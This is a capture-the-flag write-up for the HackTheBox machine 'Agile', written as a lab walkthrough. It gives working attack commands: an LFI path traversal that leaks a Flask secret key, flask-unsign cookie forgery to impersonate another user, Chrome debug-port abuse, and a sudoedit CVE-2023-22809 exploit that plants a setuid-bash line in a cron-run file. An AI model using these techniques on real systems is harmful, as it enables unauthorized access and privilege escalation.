Agile hackthebox writeup
User Flag
Machine has been patched user flag is no longer obtainable this way
$ nmap -sS -n -Pn -p- -vv -min-rate 5000 -oN allports
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
As usual a webpage. In this case, it’s called superpass.htb
so you need to add it to your /etc/hosts
. The web is a password manager. We can export our passwords as a csv file, If we intercept with burpsuite we can see it is going to
GET /download?fn=something.csv
This part is vulnerable to LFI. Also when a file doesn’t exist it gives out an error with quite some verbosity that lets us expose the source code.
GET /download?fn=../app/app/superpass/
exposing this file we get the secret key so we can forge our own cookie.
$ flask-unsign --decode --cookie '.eJwlzj0OwjAMQOG7ZGZI_Bv3MlWc2IK1pRPi7lRiftLT9yl7HnE-y_Y-rniU_bXKVix8KQxiAwtoDKrKiKGynAgpW-dFxmmIZt3cxhCx6cNd67Sqc8moc4xkS7lTnc2DubmSwuqQAvewkifPoN61OgKIZW2BUG7Idcbx1zQs3x-Sti5F.ZC_nKA.3UgNbfeZ1I2p6znKK9gH_Rl6WOo'
{'_fresh': True, '_id': '9ebd72a45929e2152777533e76db4434f185d495f9339989b9aa669cbabb70c907cd6a0caaf59f66690c1be551b7472d82f6253304bf5ce48870b32269f01e32', '_user_id': '13'}
$ flask-unsign --sign --cookie "{'_fresh': True, '_id': '9ebd72a45929e2152777533e76db4434f185d495f9339989b9aa669cbabb70c907cd6a0caaf59f66690c1be551b7472d82f6253304bf5ce48870b32269f01e32', '_user_id': '1'}" --secret 'MNOHFl8C4WLc3DQTToeeg8ZT7WpADVhqHHXJ50bPZY6ybYKEr76jNvDfsWD'
with this we get corum’s password.
$ ssh corum@superpass.htb
Root flag
First, we escalate to user edwars. By executing linpeas we can see that Chrome is in debugging mode on port 41829. So we make an ssh tunnel and with a Chrome-based browser open (in my case brave) brave://inspect/#devices
in the configuration we enable port forwarding a then the web will appear, we click inspect. Now we are logged in as edwards in a superpass test version we can get his password.
edwards@agile:/home/corum$ sudo -l
Matching Defaults entries for edwards on agile:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User edwards may run the following commands on agile:
(dev_admin : dev_admin) sudoedit /app/config_test.json
(dev_admin : dev_admin) sudoedit /app/app-testing/tests/functional/creds.txt
edwards@agile:/home/corum$ sudoedit --version
Sudo version 1.9.9
Sudoers policy plugin version 1.9.9
Sudoers file grammar version 48
Sudoers I/O plugin version 1.9.9
Sudoers audit plugin version 1.9.9
This sudo version is vulnerable to CVE-2023-22809. That makes editing any file as dev_admin possible. If we also execute pspy we can see that /app/venv/bin
is being executed by a cron job to make changes to the testing app. So if we edit /app/venv/bin/activate
(which activates the venv) we can get root. The exploit can be used like
edwards@agile:/app/venv/bin$ EDITOR='vim -- /app/venv/bin/activate' sudoedit -u dev_admin /app/config_test.json
Then we can edit /app/venv/bin/activate
, just add chmod u+s /bin/bash
and wait until the cron job is executed.
edwards@agile:/app/venv/bin$ ls -l /bin/bash
-rwsr-xr-x 1 root root 1396520 Jan 6 2022 /bin/bash
edwards@agile:/app/venv/bin$ bash -p
edwards@agile:/app/venv/bin# whoami